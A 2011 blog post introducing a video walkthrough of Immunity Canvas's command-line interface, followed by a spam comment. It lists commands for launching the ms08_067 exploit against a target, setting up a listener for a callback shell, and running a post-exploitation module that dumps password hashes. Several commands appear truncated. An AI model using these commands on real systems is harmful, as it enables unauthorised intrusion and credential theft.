Sunday, April 24, 2011

Immunity Canvas Code and CMDLine Walkthrough

This weekend was my first time playing around with Immunity Canvas. I noticed a lack of documentation for anything Non-Gui based regarding the framework. Since i had such a hard time tracking down information I decided to make a video showing Canvas basic CMDLine usage and tried to explain some module code based on my initial analysis I hope it helps

I have no previous experience with Canvas but this 20 minute video is everything I learned after playing around for a couple hours and searching everywhere for info..

Whats in this video:
-High Level Explanation of 2 modules(Exploit and Aux)
-CmdLine usage for launching exploits and Aux Modules
-Using PostEx modules after gaining a shell
-Setting up Listeners and finding modules to run

Immunity Canvas Code and CMDLine Walkthrough from ficti0n on Vimeo.

-t Target
-p Port
-v Version of OS/target
-l Your listening IP
-d Your Listening port

PostEx Stuff:
runmodule getpasswordhashes

Running Exploit Without a Listener
./exploits/ms08_067/ -t -v

Running Exploit with Listener
./ -v 10 -p 4445
./exploits/ms08_067/ -t -l -d 4445

1 comment:

  1. The internet is a powerful tool. Used correctly and you can access untold amounts of information. Used incorrectly and you may find yourself reading rubbish websites with useless information. See more c programming cheat sheet